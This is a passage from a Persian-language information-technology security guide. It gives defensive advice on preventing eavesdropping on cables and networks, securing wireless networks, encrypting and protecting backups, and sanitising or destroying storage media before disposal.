‫ﺑﻲﺍﻃﻼﻉ ﺍﺳﺖ ﻭ ﺧﻮﺵﺑﺎﻭﺭﺍﻧﻪ ﺑﻪ ﻛﺎﺭ ﺧﻮﺩ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻭ ﻧﻪ ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺑﻠﻜﻪ ﻫﻤﭽﻨﻴﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﻛﺴﺐ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﻣﻌﺮﺽ ﺳﺮﻗﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﻫﻤﭙﻮﺷﺎﻧﻲ ﺯﻳﺎﺩﻱ ﻣﻴﺎﻥ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺩﻩﻫﺎﻳﺘـﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﺯ ﻫﻤـﺔ‬
‫ﺍﻳﻨﻬﺎ ﮔﺬﺷﺘﻪ ﺍﮔﺮ ﻛﺴﻲ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﺭﺍ ﺑﺪﺯﺩﺩ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺁﻧـﺮﺍ ﻧﻴـﺰ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺩﺍﺩﻩﻫـﺎﻱ ﺷـﻤﺎ ﺩﺭ ﻣﻌـﺮﺽ ﺣﻤـﻼﺕ‬
‫ﮔﻮﻧﺎﮔﻮﻧﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻗﺪﺍﻣﺎﺕ ﻓﻴﺰﻳﻜﻲ ﻛﻪ ﺩﺭ ﻗﺴﻤﺘﻬﺎﻱ ﻗﺒﻠﻲ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪ ﺭﺍ ﺑﻲﺍﺛﺮ ﻛﻨﻨﺪ‪.‬‬
‫‪٢٨٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻒ ﺭﺍﻳﺎﻧﻪ ‪ -‬ﺍﺗﺼﺎﻝ ﻣﻴﺎﻥ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻭ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻛﺎﺑﻠﻬﺎ ﻭ ﺳﻴﻢﻛﺸﻲﻫـﺎﻱ ﺩﺍﺩﻩﻫـﺎ‪ ،‬ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫‪ Ethernet‬ﻭ ﻓﻴﺒﺮﻧﻮﺭﻱ‪ ،‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ‪ ،‬ﻭ ﺣﺘﻲ ﺍﻣﻮﺍﺝ ﺭﺍﺩﻳﻮﻳﻲ ﮔﺬﺭﻧﺪﻩ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ‪ -‬ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺩﺷـﻮﺍﺭ‬
‫ﻛﺮﺩﻥ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫•‬
‫ﻛﺎﺑﻠﻬﺎ ﻭ ﺳﻴﻤﻬﺎﻱ ﺣﺎﻣﻞ ﺩﺍﺩﻩ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺧﺮﺍﺑﻲ ﻳﺎ ﺗﻐﻴﻴﺮﺍﺕ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﻃﻮﺭ ﻣﻨﻈﻢ ﺑﺎﺯﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺑـﻞ ﭘﻮﺷـﺶﺩﺍﺭ ﻳـﺎ‬
‫ﻣﺴﻠﺢ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭﺗﺮ ﻛﺮﺩﻥ ﺍﻳﺠﺎﺩ ﻣﻨﻔﺬ ﺩﺭ ﺳﻴﻤﻬﺎ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﮔﺮ ﺑﻪ ﺍﺻﻮﻝ ﺍﻣﻨﻴﺘﻲ ﺧﻴﻠﻲ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻴﺪ‪ ،‬ﻛﺎﺑﻠﻬـﺎ ﺭﺍ‬
‫ﺩﺭ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻓﻮﻻﺩﻱ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫•‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﻓﺎﺗﺮ ﻏﻴﺮ ﻓﻌـﺎﻝ‪ ،‬ﭘﻮﺭﺗﻬـﺎﻱ ‪ Ethernet‬ﻓﻌـﺎﻝ ﻧﺪﺍﺭﻧـﺪ‪ .‬ﺑﺠـﺎﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪hub‬ﻫـﺎﻱ ‪ ،Ethernet‬ﺍﺯ‬
‫ﺳﻮﺋﻴﭽﻬﺎﻱ ‪ Ethernet‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﻨﺘﺮﻝ ﺷﺒﮑﺔ ﻣﺤﻠﻲ ﻣﺎﻧﻨﺪ ‪ arpwatch‬ﻛﻪ ﺑﺴﺘﻪﻫﺎﻱ ﺑﺎ ﺁﺩﺭﺱ ‪MAC‬‬
‫ﺑﺪﻭﻥ ﺳﺎﺑﻘﺔ ﻗﺒﻠﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﻳﺎ ﺍﺯ ﺳﻮﺋﻴﭽﻬﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺁﺩﺭﺱ ‪ MAC‬ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﻏﺮﺑـﺎﻝ ﻛﻨﻨـﺪ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﻫﺮﺟﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺑﺠﺎﻱ ﻛﺎﺑﻠﻬﺎﻱ ﻣﺴﻲ‪ ،‬ﺍﺯ ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮ ﻧﻮﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﭼﻮﻥ ﺍﻳﺠﺎﺩ ﻣﻨﻔﺬ ﻣﺨﻔـﻲ ﺩﺭ ﺁﻧﻬـﺎ ﻣـﺸﻜﻠﺘﺮ‬
‫ﺍﺳﺖ‪.‬‬
‫•‬
‫ﺍﺯ ﺑﻜﺎﺭ ﺑﺮﺩﻥ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺣﺘﻤﹰﺎ ﺑﺎﻳﺪ ﻳﻚ ﺷﺒﻜﻪ ﺑﻲﺳﻴﻢ ﺑﺴﺎﺯﻳﺪ‪ ،‬ﺗﻤﺎﻡ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻤﻨﻲ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺩﻓﺎﻉ‬
‫ﺩﺭ ﻋﻤﻖ )ﻣﺜﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﺩﻳﻮﺍﺭﻩ ﺁﺗﺶ‪ ،٦٠‬ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﭘﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ‪ ،٦١SSID‬ﺻﺎﻓﻲﻫﺎﻱ ‪ ،MAC‬ﻭ‪ (...‬ﺭﺍ ﺩﺭ ﺁﻥ ﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ‬
‫ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺍﻳﻤﻨﻲ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻣﻮﺯﺵ ﺩﻫﻴﺪ ﺩﺭ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﻫﻤﻴـﺸﻪ ﺍﺯ ‪ VPN‬ﻳـﺎ ﺳـﺎﻳﺮ‬
‫ﺗﻮﻧﻠﻬﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺑﻲﺳﻴﻢ‪ ٦٢‬ﺭﺍ ﺧﺎﺭﺝ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ )ﻳﺎ ﻣﻴﺎﻥ ﺩﻭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ( ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫•‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺣﻔﺎﻇﺖ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﻴﺸﻪ ﺑﺎ ﺍﻳﻦ ﻓﺮﺽ ﻛﻪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺷـﻤﺎ ﺗﺤـﺖ‬
‫ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﺗﻤﺎﻡ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻻﺯﻡ ﺑﺸﻤﺎﺭﻳﺪ‪ .‬ﻭﻗﺘﻲ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴﺴﺖ‪ ،‬ﺣﺪﺍﻗﻞ ﻫﻤﻪ ﺗﺮﺍﻓﻴﻚ ﺣـﺴﺎﺱ‬
‫ﺷﺒﻜﻪ )ﻣﺜﻞ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺧﺪﻣﺎﺕ ﺭﺍﻩ ﺩﻭﺭ( ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ‪.‬‬
‫‪٥٩‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳﺪ ﭘﻴﺸﻨﻴﺎﺯ ﻫﺮ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﺍﻳﻤﻦ ﻳﺎ ﻏﻴﺮ ﺍﻳﻤﻦ ‪ -‬ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺩﺭ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﺑﺴﻴﺎﺭ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪ .‬ﺣﺪﺍﻗﻞ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻛﻪ ﺑﻪ ﻃﻮﺭ ﻣﻌﻤﻮﻝ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻳﺘﺎﻥ ﻣﺤﻔﺎﻇـﺖ ﻛﻨﻴـﺪ‪.‬‬
‫ﻫﻴﭻ ﻭﻗﺖ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻧﺎﺣﻴﺔ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻣﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻧﻜﻨﻴﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻣﺤﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﻫﺴﺘﻨﺪ )ﺑﻬﺘـﺮ‬
‫ﺍﺳﺖ ﺟﺎﻳﻲ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻞ ﻧﮕﻬﺪﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺘﺎﻥ ﺑﺎﺷﺪ( ﻧﮕﻬﺪﺍﺭﻳﺪ‪ ،‬ﻭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﺑﻪ ﭼﻪ ﻛﺴﻲ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺯ ﻣﺤﻠـﻲ ﺑـﻪ ﻣﺤـﻞ‬
‫ﺩﻳﮕﺮ ﺣﻤﻞ ﻛﻨﺪ‪.‬‬
‫ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﻧﻮﺷـﺘﻪﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﭘـﺸﺘﻴﺒﺎﻥ‪ ،‬ﺁﻧﻬـﺎ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛﻨﻴـﺪ‪.‬‬
‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺍﻣﻜﺎﻥ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﺷﺪﻥ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻳﺎ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻣـﺴﺮﻭﻗﻪ ﺭﺍ ﺑـﺮﺍﻱ ﺭﻗﻴـﺐ‬
‫ﻛﺎﻫﺶ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺰ ﻣﺤﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺗﺎ ﻫﻢ‬
‫ﻣﻬﺎﺟﻢ ﻧﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﻴﺎﺑﺪ‪ ،‬ﻭ ﻫﻢ ﺩﺭﺻﻮﺭﺕ ﺗﻌﻮﻳﺾ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻠﻴﺪ ﺷﻤﺎ ﮔﻢ ﻧﺸﻮﺩ‪.‬‬
‫ﻼ ﻧﻮﺍﺭ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻧﺴﺒﺖ ﺑـﻪ ﻓﺮﺁﻳﻨـﺪﻱ‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺎﻳﮕﺎﻧﻲﻫﺎ ﺑﻌﻠﺖ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻄﻲ ﺁﺭﺍﻡ ﺁﺭﺍﻡ ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻣﻮﺳﻮﻡ ﺑﻪ ‪ print through‬ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻴﺪﺍﻧﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳـﻚ ﻗـﺴﻤﺖ ﭘﻴﭽﻴـﺪﻩ ﺷـﺪﻩ ﺑـﻪ ﺩﻭﺭ ﻗﺮﻗـﺮﺓ ﻧـﻮﺍﺭ‪ ،‬ﺭﻭﻱ‬
‫ﻻﻳﻪﻫﺎﻱ ﺯﻳﺮﻳﻦ ﺍﺛﺮ ﻣﻲﮔﺬﺍﺭﻧﺪ‪ .‬ﺗﻨﻬﺎ ﺭﺍﻩ ﺍﻳﻨﻜﻪ ﺑﻔﻬﻤﻴﻢ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ ﻳﺎ ﻧﻪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻫـﺮ ﺍﺯ‬
‫ﭼﻨﺪﮔﺎﻩ ﺑﺮﺭﺳﻲ ﻛﻨﻴﻢ‪.‬‬
‫‪۵۹‬‬
‫ﺁﺩﺭﺱ ﻓﻴﺰﻳﻜﻲ ﺛﺎﺑﺖ ﻫﺮ ﮔﺮﻩ ﺩﺭ ﺷﻜﺒﻪ‬
‫‪Firewall‬‬
‫‪SSID Broadcasts‬‬
‫‪Wireless Access Point‬‬
‫‪60‬‬
‫‪61‬‬
‫‪62‬‬
‫‪٢٨٩‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻳﻚ ﻣﺸﻜﻞ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ‪ ،‬ﺑﺮﭼﺴﺐﺯﻧﻲ ﻭ ﺻﻮﺭﺕ ﺑﺮﺩﺍﺭﻱ ﻧﺎﻣﻨﺎﺳﺐ ﺍﺯ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﺮ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﮔـﺬﺍﺭﻱ‬
‫ﻼ ﻣﺴﺘﻨﺪﺳﺎﺯﻱ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻳﺎ ﻓﻬﺮﺳﺖﺑﺮﺩﺍﺭﻱ ﻛﻪ ﻣﺆﺛﺮ ﻣﻲﺩﺍﻧﻴﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ‪ ،‬ﻣﺸﺮﻭﻁ ﺑﺮ ﺍﻳﻨﻜﻪ ﻳﻜﻲ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻧﻤﻮﺩﻩ ﻭ ﻛﺎﻣ ﹰ‬
‫ﭘﺎﻛﺴﺎﺯﻱ ﺭﺳﺎﻧﻪ ﻗﺒﻞ ﺍﺯ ﺍﻧﻬﺪﺍﻡ‬
‫ﻼ ﺑـﻪ ﻃـﻮﺭ ﻛﺎﻣـﻞ ﭘـﺎﻙ‬
‫ﻭﻗﺘﻲ ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ‪ ،‬ﺩﻳﺴﮑﻬﺎﻱ ﻓﺸﺮﺩﻩ‪ ،‬ﻳﺎ ﻧﻮﺍﺭﻫﺎ ﺭﺍ ﺍﺯ ﺭﺩﻩ ﺧﺎﺭﺝ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺳﺎﻧﻪ ﻗـﺒ ﹰ‬
‫ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﭘﺎﻛﺴﺎﺯﻱ‪ ٦٣‬ﻧﺎﻡ ﺩﺍﺭﺩ‪ .‬ﺣﺬﻑ ﻣﻌﻤﻮﻟﻲ ﻭ ﺳﺎﺩﺓ ﻳﻚ ﻓﺎﻳﻞ ﻛﻪ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺷﻤﺎ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻓﺎﻳـﻞ‬
‫ﻻ ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺩﺍﺩﺓ ﺍﺻﻠﻲ ‪ -‬ﻭ ﮔﺎﻫﻲ ﻛﻞ ﻓﺎﻳﻞ ‪ -‬ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺮﻣﻴﻢ ﺷﻮﻧﺪ‪ .‬ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﺑﺎﻳـﺪ ﺑـﺎ‬
‫ﺭﺍ ﺍﺯ ﺑﻴﻦ ﻧﻤﻲﺑﺮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺼﻮﺹ ﻛﻪ ﺑﻄﻮﺭ ﺧﺎﺹ ﺑﺮﺍﻱ ﻫﺮ ﻧﻮﻉ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﭘﺎﻛﺴﺎﺯﻱ ﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻧﻮﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﭘﺎﻙﻛﻨﻨﺪﻩ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻳﺎ ﭘﺎﻛﺴﺎﺯ ﺍﻧﺒﻮﻩ ‪ -‬ﻳﻚ ﻭﺳﻴﻠﺔ ﺩﺳﺘﻲ ﺍﻟﻜﺘﺮﻭﻣﻐﻨﺎﻃﻴﺴﻲ ﻛـﻪ ﺩﺍﺭﺍﻱ ﻣﻴـﺪﺍﻥ‬
‫ﻣﻐﻨﺎﻃﻴﺴﻲ ﻗﻮﻱ ﺍﺳﺖ ‪ -‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺍﻃﻼﻋﺎﺕ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺒﻮﻩ ﭘﺎﻛﺴﺎﺯﻱ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺁﻧﻘﺪﺭ ﻣﺠﺪﺩﹰﺍ ﺑﺨﻮﺍﻧﻴﺪ ﺗﺎ ﺑﻔﻬﻤﻴﺪ ﺑـﺮﺍﻱ‬
‫ﻣﺤﻮ ﻧﻤﻮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﭼﻨﺪ ﺑﺎﺭ ﭘﺎﻙ ﻛﺮﺩﻥ ﺁﻧﻬﺎ ﺑﻪ ﺍﻳﻦ ﺭﻭﺵ ﻻﺯﻡ ﺍﺳﺖ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻧﻮﻳﺴﻲ ﺭﺳﺎﻧﻪ ﻧﻮﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺣﺘﻲ ﻣﺤﺘﻮﻳﺎﺕ ﺭﺳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﻳﻜﺒﺎﺭ ﻗﺎﺑﻞ ﻧﻮﺷﺘﻦ ﻫـﺴﺘﻨﺪ ﺭﺍ ﻧﻴـﺰ ﭘـﺎﻙ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﺛﺮﺑﺨﺸﻲ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺍﺯ ﻳﻚ ﻧﻮﻉ ﺭﺳﺎﻧﻪ ﺑﻪ ﻧﻮﻉ ﺩﻳﮕﺮ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺎﺯﻫﻢ ﻣﺎﻧـﺪﻩﻫـﺎﻳﻲ ﺍﺯ‬
‫ﺧﻮﺩ ﺑﺮﺟﺎ ﺑﮕﺬﺍﺭﺩ‪ .‬ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺷﺎﻳﺪ ﻧﺎﺑﻮﺩ ﻛﺮﺩﻥ ﻓﻴﺰﻳﻜﻲ ﺍﺭﺟﺢ ﺑﺎﺷﺪ‪.‬‬
‫ﻛﻮﺭﻩﻫﺎﻱ ﺯﺑﺎﻟﻪﺳﻮﺯﻱ ﻭ ﺣﻤﺎﻡﻫﺎﻱ ﺍﺳﻴﺪﻱ ﺑﺮﺍﻱ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﻧﻮﺍﺭﻫﺎ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳﺐ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺯ ﻧﻈﺮ ﺷﺮﺍﻳﻂ ﻣﺤﻴﻂ ﺯﻳﺴﺖ ﻗﺎﺑﻞ ﻗﺒـﻮﻝ‬
‫ﻧﻤﻲﺑﺎﺷﻨﺪ‪ .‬ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﺷﻜﺴﺘﻦ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﻭ ﺑﺴﺘﻪﻫـﺎﻱ ‪ floppy‬ﺗـﺮﺟﻴﺢ ﺩﺍﺩﻩ ﻣـﻲﺷـﺪ‪ ،‬ﺍﻣـﺎ ﺑـﺎ ﺍﻓـﺰﺍﻳﺶ ﺣﺠـﻢ ﺩﻳـﺴﻜﻬﺎ‪،‬‬
